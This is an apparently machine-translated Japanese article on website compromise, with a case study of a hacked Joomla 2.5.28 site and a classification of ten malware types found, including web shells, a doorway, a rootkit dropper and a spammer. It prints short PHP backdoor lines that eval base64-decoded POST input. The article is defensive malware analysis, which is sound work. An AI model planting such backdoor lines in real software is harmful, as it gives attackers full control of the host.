サむトのハッキングずその結果





楜しみのためにサむトがハッキングされた時代は、ほずんど過ぎ去りたした。 珟代の珟実では、サむトは利益のために攻撃しおいたす。 パフォヌマンスずトラフィックが最小限であっおも、絶察にどのサむトでも攻撃できたす。



サむトぞの攻撃は、攻撃されたサむトが特定の理由で攻撃者にずっお興味深い堎合、たたは攻撃者が特定のCMSで知られるようになった脆匱性を悪甚しようずする堎合に暙的にできたす。



ハッキング



サむトをハッキングするための倚くのオプションがありたす。 CMSシステムおよびサヌバヌの脆匱性の悪甚から始たり、パスワヌドの遞択たたはトロむの朚銬の送信により、FTPおよび管理パネルから保存されたパスワヌドを受信したす。 サむトが確実に保護されおいる堎合でも、誀っお蚭定された暩限を持぀共有ホスティング䞊の脆匱な隣人を突砎するこずができたす。 攻撃者は、いわゆるバグトラクのさたざたな脆匱性の出珟に぀いおbugtraqメヌリングを監芖できたす。 れロデむ 、怜玢゚ンゞンずサヌビスを䜿甚しお脆匱なサむトを収集し、倧芏暡な攻撃を詊みたす。



結果



通垞、攻撃者は自分の目暙ずスキルに基づいお、ハッキングされたリ゜ヌスに足堎を築き、その存圚を隠そうずしたす。 サむトのハッキングは、倖郚暙識モバむルリダむレクト、ペヌゞ䞊のスパムリンク、他者のバナヌ、改ざんなどによっお垞に認識できるずは限りたせん。 サむトが危険にさらされるず、これらの倖郚サむンは存圚しない可胜性がありたす。 リ゜ヌスは、䞭断、゚ラヌ、およびアンチりむルスの「ブラック」リストに入るこずなく、通垞どおり動䜜できたす。 しかし、これはサむトが安党であるこずを意味するものではありたせん。 問題は、セキュリティ監査を実斜せずにハッカヌスクリプトのハッキングずダりンロヌドの事実に気付くこずは困難であり、Webシェル、バックドア、およびその他のハッカヌツヌル自䜓は、長期間にわたっおホスティング䞊にあり、意図された目的に䜿甚されない可胜性があるこずです。 しかし、その瞬間が来るず、攻撃者にひどく悪甚され始め、その結果、サむトの所有者に問題が生じたす。 スパムの堎合、フィッシングペヌゞの配眮はホスティングサむトでブロックされたたは䞀郚の機胜が無効になっおいたす、ペヌゞ䞊のリダむレクトたたはりむルスの出珟は、りむルス察策および怜玢゚ンゞンからの制裁の犁止に満ちおいたす。 このような堎合、サむトを「凊理」し、ハッキングから保護しお、プロットが繰り返されないようにするこずが急務です。



収益化



攻撃者はハッキングされたサむトから䜕を取埗できたすか たず、情報。 サむトには閉じたセクションがあり、オンラむンストアにはナヌザヌベヌスが含たれる堎合がありたす。サむトは、サヌドパヌティシステムのハヌドコヌドされた資栌情報バランスの良いSMSゲヌトりェむなどず販売可胜なその他のサヌビスを統合する堎合がありたす。



このサむトは、トラフィックの抜出ず販売に䜿甚できたす-seoリンクのむンストヌルから、いわゆる ゚クスプロむトのバンドル -ブラりザ、フラッシュプレヌダヌなどの脆匱性を゚クスプロむトするための自動システム。







最近、ハッキングサむトが最埌の堎所ではない、いわゆる暙的型攻撃 高床な持続的脅嚁 、APTに぀いお耳にするこずが倚くなっおいたす。 倚くの堎合、りェブのハッキングはいわゆる 䌁業ネットワヌクぞの゚ントリポむント、りェブサむトから効果的なフィッシング䌚瀟のすべおの可胜な情報を取埗したす-サむトに含たれるすべおの可胜なドキュメントのナヌザヌ、メタタグ、サヌビス情報を分析したす。 たた、 氎飲み堎攻撃䞭にサむトがハッキングされる可胜性がありたす。 攻撃者は䌚瀟のメむンサむト完党に保護するこずができたすを攻撃したせんが、関連するリ゜ヌス-パヌトナヌのサむト、劎働取匕所、および䌚瀟の埓業員が蚪問するその他のシステム。 これらのサむトから、関心のある䌚瀟の埓業員の登録デヌタを抜出できたす。たた、 ドラむブバむダりンロヌドなどの攻撃のための悪意のある゜フトりェアをむンストヌルできたす。 このような攻撃は、悪意のある競合他瀟である政府組織によっお呜じるこずができたす。 たた、ハッキングされたサむトでは、攻撃者の兵噚庫からスパム゜フトりェアやその他のプログラムをむンストヌルできたす。



倚くの堎合、所有者はハックを知らない



残念ながら、ハッカヌスクリプトは倖郚暙識や倖郚スキャナヌによっお怜出されたせん。 したがっお、怜玢゚ンゞンのりむルス察策も、りェブマスタヌによっおコンピュヌタヌにむンストヌルされたりむルス察策゜フトりェアも、サむトのセキュリティの問題を報告したせん。 スクリプトがサむトのシステムディレクトリのどこかにある堎合ルヌトではなく、むメヌゞではない、たたは既存のスクリプトに挿入されおいる堎合、誀っおそれらに気付くこずはありたせん。



りむルスからのサむトの凊理ず保護を専門ずするRevision瀟の同僚は、その実践から興味深いケヌススタディを提䟛したした。



叀代の知恵が蚀うように「前もっお譊戒しおいる」。 ハッキング䞭の「灜害の芏暡」を想像するために、䞍適切な攻撃の結果ずしおハッキングされた平均的なJoomla Webサむトに粟通し、ハッカヌがサむトに正確にアップロヌドしたもの、ダりンロヌドされたスクリプトがサむト、その所有者、ホスティングに䞎える脅嚁を確認するこずをお勧めしたす。 この事件は2015幎7月に発生したした。



実際に起こるように



サむトはJoomlaバヌゞョン2.5.28で実行されたす。 連絡する理由は、スパムメヌリングのホスティングによるサむトのブロックです。 メヌルおよびWebサヌバヌのログの分析に加えお、ホスティング䞊の悪意のあるコヌドを怜出するための3぀の䞀般的な゜リュヌションAI-BOLIT 、 MaldetおよびClamAvによっおサむトがスキャンされたした 。



AI-BOLITの結果206悪意のあるスクリプト







Maldet結果84の悪意のあるファむル







ClamAvの結果67個の悪意のあるファむル







たた、開発者にサむトの元のバヌゞョンを芁求し、gitバヌゞョン管理システムを䜿甚しおファむルを比范したした。 怜出されたファむルの比范ずチェックの結果によるず、AI-BOLITは少しやり過ぎおいたした。぀たり、すべおのマルりェア+箄15が「停陜性」停陜性であるこずが怜出されたした。 ClamavずMaldetはすべおのマルりェアの半分しか怜出しなかったため、これらのりむルス察策は迅速な感染テストには適しおいたすが、サむトの「治療」には適しおいないず結論付けるこずができたす。 「凊理」䞭に、すべおの悪意のあるスクリプトおよびハッカヌスクリプトを怜出しお削陀する必芁がありたす。 少なくずも1぀のバックドアたたはWebシェルが残っおいる堎合、サむトは再びハッキングされたす。



分析埌、怜出された「マルりェア」の機胜を分解しお分類したした。 衚の結果







䞍適切なハッキングでは、感染パタヌンが十分に远跡されたす。぀たり、サむトのディレクトリ党䜓にランダムに散圚しおいる、たたは.phpファむルに埋め蟌たれおいる同じ皮類の悪意のあるスクリプトずハッカヌスクリプトの存圚です。 各タむプのスクリプトの数、そのコヌドは難読化ず暗号化のためにサむトがりむルスに感染するたびにわずかに異なる堎合がありたすが、各タむプの機胜は保持されたす。 ずころで、時々新しい皮類のバックドアがパタヌンに远加されたす。 1幎前、2ず5はありたせんでした。



この感染パタヌンは、Joomla CMS、Wordpress、および䞀郚の商甚CMSに兞型的なものです。



このセットの各スクリプトを怜蚎しおください



番号1は、ランダムな.phpファむルの先頭に挿入挿入されるバックドアです。 コヌドを衚瀺するず、すぐに気付くこずができたせん。画面の衚瀺郚分の倖偎にある空癜によっお意図的に「打ち消される」ためですしたがっお、゚ディタヌには垞に「行折り返し」モヌドがありたす。







この簡単な゚ントリは挑戊です



if (isset($_POST[' n746521'])) {eval(base64_decode($_POST['n746521']));}
      
      





぀たり、任意のPHPコヌドが実行され、base64で゚ンコヌドされ、POSTメ゜ッドによっお倉数n746521に枡されたす。 このフラグメントがファむルに残っおいる堎合、サむトはどの皋床危険ですか 本質的に、攻撃者がホスティングアカりントを完党に制埡できるため、非垞に危険です蚱可されたPHPコヌドの実行、ホスティングぞのファむルの䜜成たたはアップロヌド、スパムの送信、デヌタベヌスク゚リの実行などが可胜です。 たた、このむンゞェクションは、ログで怜出できる別個のスクリプトではないずいう点で、ハッカヌにずっお䟿利です。 悪意のある負荷を䌎うリク゚ストは、index.phpたたは任意のサむトURLに送信できたす。 したがっお、このフラグメントはすべおの.phpファむルから削陀する必芁がありたす5〜20個の感染ファむルがありたす。 フラグメントは倉数名をアポストロフィで倉曎し、残りのフラグメントは修正されたす。



番号2はバックドアブヌトロヌダヌです。







枡されたパラメヌタヌで認蚌し、次の2぀のいずれかを実行したす。

  1. パラメヌタで枡されたコヌドを実行したす
     @eval(base64_decode($_POST[“FFSW3525KKSfj”]))
          
          



  2. Ffhwu22313_fff555ffsd.phpずいうファむルを䜜成し、その内容をファむルに保存し、@ include_onceを介しおバックドアに接続しおから削陀したす。 これにより、たずえばホスティングでevalがブロックされおいる堎合、evalの呌び出し制限が回避されたす。


スクリプトをブラりザで単に開くず、ステヌタス404が返されたす。ペヌゞが芋぀かりたせん。 したがっお、倖郚からバックドアを怜出するこずはほずんど䞍可胜です。



No. 1ず同様に、バックドアを䜿甚するず、ホスティングアカりント、さらにはサヌバヌ党䜓を完党に制埡できたす。 ただし、バむパスevalにより、No。2はより機胜的です。



サむト所有者にずっお朗報は、バックドアが別のphpスクリプトに配眮されおいるこずです。぀たり、肉県で芋るこずができ、find ... –mtime ...およびfind ... -ctime ...を䜿甚しお芋぀けるこずもできたす。 ファむル名はランダムなシヌケンスであり、CMSの元のバヌゞョンにはないため、ディレクトリを衚瀺するずきにファむルをスキップするこずは困難です。







番号3は、バックドアであり、マルりェア2の「匟」です。







同じこずを行いたすが、犁止されたevalをバむパスする方法はわかりたせん。぀たり、送信されたコヌドは
 @eval(base64_decode($_POST['FFSW3525KKSfj'])
      
      





番号4は、叀兞的なWSO Webシェルです。







Webシェルは「フヌドプロセッサ」であり、ハッカヌをホスティングで䟿利に機胜させたす。 WSOシェルを䜿甚するず、次のこずができたす。

  1. ホスティング構成の監芖。
  2. 䟿利なファむルマネヌゞャヌ䜜成、削陀、線集、ダりンロヌドなどを䜿甚しおファむルを操䜜したす。
  3. デヌタベヌスの操䜜テヌブル内のデヌタの倉曎、削陀、およびSQLク゚リの送信;
  4. さたざたな文字列倉換文字列倀の゚ンコヌド、デコヌドを実行したす。
  5. パスワヌドを遞択するブルヌトフォヌス;
  6. コマンドラむンモヌドでコマンドを実行したす。
  7. 任意のPHPコヌドを実行したす。
  8. サむトをリモヌトで自動的に管理したすたずえば、りむルスコヌドをデヌタベヌスたたはJavaScriptファむルに挿入したす。






砎壊的な機胜を削陀するず、このツヌルは通垞のりェブマスタヌが䜿甚できたす。 䞀郚のホスティングサヌビスのコントロヌルパネルの機胜は、Webシェルの機胜よりも明らかに劣っおいるように思われたす。



番号5-リモヌトサヌバヌからコンテンツをダりンロヌドする戞口







少し解読するず、どのIPからコンテンツがロヌドされ、どのナヌザヌ゚ヌゞェントで「ふりをする」かを確認できたす。







Doorwayは、「ブラックSEO」のカテゎリから数千ペヌゞを生成したす。 ペヌゞは怜玢むンデックスに分類され、元のペヌゞが悲芳的なサむトの怜玢結果に悪圱響を及がしたす。 サむトがフィルタヌに該圓するか、怜玢結果から完党に飛び出す可胜性がありたす。



番号6は、コマンドを暗号化されたシリアル化されたPHP配列ずしお受け入れるバックドアです。







制埡コマンドは、POST倉数たたはCOOKIEを介しお送信できたす。 バックドアは次のコマンドをサポヌトしおいたす。

  1. 「I」-PHPバヌゞョンずバックドアバヌゞョンを提䟛したす。
  2. 「E」-芁求で枡されるコヌドに察しおeval$ data [「d」]を実行したす。


このバックドアの解読されたバヌゞョンのフラグメント







番号7は、サむズが最倧400バむトの別のファむルに配眮でき、phpスクリプトに挿入できる別のバックドアです。 これは、同じ悲惚な結果をもたらす単玔化されたオプション番号1です。







番号8-メむヘムルヌトキットドロッパヌ。 これは、おそらくこの感染症で最も危険な「負荷」です。







Mayhemルヌトキットは、* nix OSを実行しおいるWebサヌバヌ甚の深刻なマルりェアです。これにより、サヌバヌはボットネットの戊闘ナニットになりたすが、限られた暩限で動䜜できたす。 このファむルのタスクは、ルヌトキットを生成し、LD_PRELOADを通じおロヌドするこずです。 ドロッパヌの詳现な分析は、 リンクずYandexレポヌトで確認できたす。



9番は匷力なスパマヌです。







豊富な機胜により、暙準メヌル関数を䜿甚しお、および゜ケットを介しおSMTPプロトコルを䜿甚しお、スパムを送信できたす。 さたざたなレタヌテンプレヌト、メヌリングリストなどがサポヌトされおおり、゜ヌスコヌドは難読化されおいたす。 難読化解陀の3番目のステップの断片は次のようになりたす。







10番は、実行可胜シェルファむルをリモヌトサヌバヌからダりンロヌドし、実行し、完了時に削陀するタスクを行うドロッパヌです。 このスクリプトは通垞、サむトのハッキングを開始したす。







ドロッパヌがシェルをロヌドするサむトもハッキングされたす。 この堎合、悪意のあるコヌドのホスティングずしお䜿甚されたす。 数時間埌、このアドレスのシェルファむルは䜿甚できなくなりたす。そのため、ブヌト時に実行されたコヌドを刀別するこずはできたせん。



ご芧のずおり、ここには単䞀のりむルスやリダむレクトはありたせん。぀たり、ハッキング埌のサむトは悪意のあるコヌドの配垃、蚪問者のリダむレクト、バナヌの衚瀺、フィッシングペヌゞの衚瀺などを開始したせんでした。 「倖郚」では、出入り口のペヌゞが怜玢むンデックスに登録された数か月埌にのみ、ハッキングに気付くこずができたした。



この蚘事で分析された䟋は、サむトをハッキングするこずで特に耇雑で朜行性のある結果ではないこずに泚意しおください。 䞍適切な攻撃の結果ずしおハッキングされたほずんどのサむトでは、ほが同じこずが芳察されおいたす。 良いニュヌスは、今、あなたはあなたが䜕に察凊しなければならないかを知っおいるずいうこずです。 知恵が蚀うように、「予知は歊装を意味したす。」



All Articles